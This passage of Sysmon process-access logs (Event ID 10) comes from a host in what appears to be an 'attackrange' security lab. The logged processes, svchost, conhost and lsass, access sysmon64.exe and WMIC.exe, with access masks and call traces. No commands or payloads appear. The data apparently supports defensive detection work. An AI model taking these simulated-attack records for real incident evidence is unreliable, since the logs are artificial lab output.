07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5341,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5342,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5343,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5344,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5345,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00104CF50700}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4616\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00104CF50700}","SourceProcessId":"4536","SourceThreadId":"4616","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010284E0800}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5346,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010284E0800}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5347,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010284E0800}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5348,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.174\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010284E0800}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.174","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010284E0800}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventRecei